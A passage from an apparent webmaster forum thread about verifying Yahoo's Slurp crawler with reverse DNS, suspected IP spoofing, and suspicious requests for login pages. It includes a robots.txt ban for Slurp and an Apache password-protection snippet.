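        return ip in forward(host)[2]      # must resolve back to the IP
    except OSError:                        # any lookup failure: not verified
        return False
```

    A spoofed or merely claimed "Slurp" fails at the reverse step; a scraper that happens to control its own rDNS fails at the forward step.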

    On the other hand, this article ( [en.wikipedia.org...] ) describes another use of IP forgery, in denial-of-service attacks. If (a big IF) this is the case in your situation, the attack would be against Yahoo (not you) - by flooding Yahoo with responses to requests that they hadn't sent.

    Your blocking the requests might trivially reduce the amount of data being sent back to Yahoo (if your 403 response is shorter than your 404 response), but not reduce the number of responses. Yahoo will simply receive your 403's instead of your 404's.

    IF this is the case, then your contacting Yahoo at least once was probably a good idea, because otherwise they could think your site was attacking them. Also, if you provided them with the complete requests from your log, they might have been able to check those against the requests that they actually sent out. If they didn't match, it might, somehow, help them with respect to a DDOS attack underway or planned.

    I disallowed slurp * yesterday at 7am EST, by 3pm EST it had stopped crawling.

    That would seem to suggest that the sender was receiving your responses and adjusted their behavior accordingly. If so, it wasn't IP address spoofing. I guess you can't really be sure they stopped crawling *because* of your ban and not just coincidentally at the same time as the result of your previous contacts with them.

    Or maybe your site was being used in a DDOS attack that was underway, and Yahoo found the source and got the originating server shut down so it's not sending the requests to your site anymore. Once you start trying to analyze scenarios, there can be an overwhelming number of possibilities.
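    For reference, the ban described above is the standard robots.txt exclusion; `Slurp` is the user-agent token Yahoo's crawler honors:

```
User-agent: Slurp
Disallow: /
```

    Well-behaved crawlers only re-fetch robots.txt periodically, which is consistent with the roughly eight-hour lag between the change and the crawling stopping.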


    Login pages can't be classed as sensitive pages. If you live in a home, everybody in the world knows your home has a door. If you use Wordpress, it has an administrator login page with a standardized name. Same for Joomla or any other web application.

    It really doesn't matter if people or crawlers go snooping through your site looking for login pages. If you don't have the login pages they're looking for, there's no harm done. If you do have the login pages they're looking for, your "door" is protected by a super-strong password (right?), and there's still no harm done and no harm possible.

    It still doesn't make it right for Yahoo (or a rogue 3rd party) to go tapping the walls to find out where the safe is.

    As long as you keep the safe locked, it really doesn't matter how much wall tapping goes on, except for the probably small amount of bandwidth used by the 404 responses.

    In the case of Yahoo (and any search engine crawler), it's their job to tap the walls and find out what pages are or are not in a site.

    If you DO have pages (or any files or directories at all) that you DON'T want crawlers to run across, password protect them. Don't list them in robots.txt. Just password protect them.
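    On Apache, for example, that protection is a few lines of Basic auth configuration in the directory's .htaccess (the file paths here are illustrative):

```
# .htaccess for the directory to protect (paths are illustrative)
AuthType Basic
AuthName "Admin area"
AuthUserFile /home/example/.htpasswd
Require valid-user
```

    Unlike a robots.txt entry, this refuses the request outright instead of advertising the path to anyone who reads the file.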

    Is it now Yahoo policy to deliberately and pro-actively sniff for admin and login pages.

    Yahoo or Google or some other crawler might do that for some reason, such as to create estimates of internet web application usage. They also crawl looking for embedded malware, and probably also for other reasons. They're crawlers, and they make statistical models of the internet, and who knows what else.

    Has someone worked out how to manipulate serps in order to find admin and login pages.

    No. Those can be found by ordinary web searches.

    If those IPs were Yahoo, they got 404 responses indicating that those pages don't exist on your site, which is correct.

    If those IPs were not Yahoo, they got no response at all, and still have no idea whether you have those pages or not. And even if they knew you had them, it wouldn't make any practical difference.

    A scenario not yet mentioned is the possibility that someone hacked the Yahoo crawler server(s) and reprogrammed them to make these requests. My response to that is no: anyone with the sophistication to do that would have put them to a far more sophisticated use than these lame requests.
